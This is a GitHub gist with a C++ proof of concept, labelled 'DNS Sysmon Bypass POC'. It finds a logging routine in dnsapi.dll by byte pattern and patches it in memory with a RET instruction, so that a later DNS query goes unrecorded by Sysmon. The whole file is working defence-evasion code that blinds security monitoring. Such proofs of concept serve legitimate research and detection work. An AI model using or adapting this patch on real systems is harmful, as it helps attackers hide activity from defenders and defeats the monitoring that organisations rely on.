Last active
May 4, 2022 15:47
-
-
Save xpn/59bbde64b965b4374a9f390d4ae44288 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <Windows.h> | |
| #include <WinDNS.h> | |
| // Pattern for hunting dnsapi!McTemplateU0zqxqz | |
| #define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
| #define PATTERN_LEN 14 | |
| // Search for pattern in memory | |
| DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { | |
| ULONG offset = 0; | |
| for (int i = 0; i < 0x200000; i++) { | |
| if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) { | |
| if (memcmp(mem + i, signature, signatureLen) == 0) { | |
| // Found the signature | |
| offset = i; | |
| break; | |
| } | |
| } | |
| } | |
| return offset; | |
| } | |
| int main() | |
| { | |
| DWORD oldProtect, oldOldProtect; | |
| printf("DNS Sysmon Bypass POC\n by @_xpn_\n\n"); | |
| unsigned char *dll = (unsigned char *)LoadLibraryA("dnsapi.dll"); | |
| if (dll == (void*)0) { | |
| printf("[x] Could not load dnsapi.dll\n"); | |
| return 1; | |
| } | |
| DWORD patternOffset = SearchPattern(dll, PATTERN, PATTERN_LEN); | |
| printf("[*] Pattern found at offset %d\n", patternOffset); | |
| printf("[*] Patching with RET\n"); | |
| VirtualProtect(dll + patternOffset, 10, PAGE_EXECUTE_READWRITE, &oldProtect); | |
| *(dll + patternOffset) = 0xc3; | |
| VirtualProtect(dll, 10, oldProtect, &oldOldProtect); | |
| printf("[*] Sending DNS Query... should now not be detected\n"); | |
| DnsQuery_A("blog.xpnsec.com", DNS_TYPE_A, DNS_QUERY_STANDARD, NULL, NULL, NULL); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment